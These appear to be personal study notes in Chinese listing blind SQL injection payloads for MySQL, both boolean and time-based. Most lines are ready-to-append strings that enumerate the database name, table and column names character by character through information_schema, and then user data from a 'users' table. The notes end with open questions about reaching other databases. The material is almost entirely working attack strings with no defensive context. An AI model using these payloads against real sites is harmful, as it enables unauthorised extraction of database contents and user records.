判斷數據庫名的長度 小於5
and length(database()) = 4
或者:通過返回時間來判斷數據庫名的長度
and if(length(database()) <5,sleep(10),1) --
猜庫名
and ascii(substr(database(),1,1)) >=65 (65爲asii值)
猜表的數量
and (select count(table_name) from information_schema.tables where table_schema = database()) =2
第一個表名的長度
and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9
或者:通過返回時間來判斷第一個表名的長度
and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>8,sleep(2),1) --
猜第二個表名的長度
and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=9
........
substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)
猜第一個表名的第一個字母
and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)) >97
猜第一個表名的第二個字母
and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,2)) >97
猜第一個表名的第三個字母
and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,3)) >97
...........
猜第二個表名的第一個字母
and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 1,1),1,1)) >97
猜第二個表名的第二個字母
and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 1,1),2,2)) >97
................
猜第一個表的字段個數
and (select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 0,1)) >1
或者:通過返回時間來猜第一個表的字段個數
and if((select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 0,1)) >1,sleep(2),1)
猜第二個表的字段個數
and (select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 1,1)) >1
.................
猜第一個表的第一個字段長度
and length(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 0,1),1)) > 1
猜第一個表的第二個字段長度
and length(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 1,1),1)) > 1
.........................
猜guestbook表的第一個字段長度
and length(substr((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1),1)) > 1
猜第一個表的第一個字段名的第一個字
and ascii(substr((select column_name from information_schema.columns where table_name= (select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 0,1),1)) >97
猜第一個表的第一個字段名的第二個字
and ascii(substr((select column_name from information_schema.columns where table_name= (select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 1,1),1)) >97
猜第二個表的第一個字段的第一行的字段值
先求它長度
and length(substr((select user_id from users limit 0,1),1)) =1
求它的值
and ascii(substr((select user_id from users limit 0,1),1,1)) >1
怎麼查詢第二個庫??????????????????????????
information.schema.cshema.name select count(schema_name) from information_schema.schemata =7
怎麼查詢第二個庫裏的表?????????????????????????